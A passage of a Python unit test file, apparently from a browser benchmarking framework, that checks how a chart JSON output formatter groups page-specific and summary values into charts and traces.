results.AddValue(v0)
results.DidRunPage(self._page_set[0])
self._formatter.Format(results)
d = json.loads(self._output.getvalue())
self.assertIn('foo', d['charts'])
def testAsChartDictSerializable(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
page_specific_values = [v0]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
json.dumps(d)
def testAsChartDictBaseKeys(self):
page_specific_values = []
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertEquals(d['format_version'], '0.1')
self.assertEquals(d['benchmark_name'], 'benchmark_name')
def testAsChartDictPageSpecificValuesSamePage(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
def testAsChartDictPageSpecificValuesAndComputedSummaryWithTraceName(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo.bar', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[1], 'foo.bar', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
self.assertTrue('http://www.bar.com/' in d['charts']['foo'])
self.assertTrue('bar' in d['charts']['foo'])
def testAsChartDictPageSpecificValuesAndComputedSummaryWithoutTraceName(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[1], 'foo', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
self.assertTrue('http://www.bar.com/' in d['charts']['foo'])
self.assertTrue('summary' in d['charts']['foo'])
def testAsChartDictSummaryValueWithTraceName(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo.bar', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('bar' in d['charts']['foo'])
def testAsChartDictSummaryValueWithoutTraceName(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('summary' in d['charts']['foo'])
def testAsChartDictValueSmokeTest(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo.bar', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertEquals(d['charts']['foo']['bar']['values'], [3, 4])
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.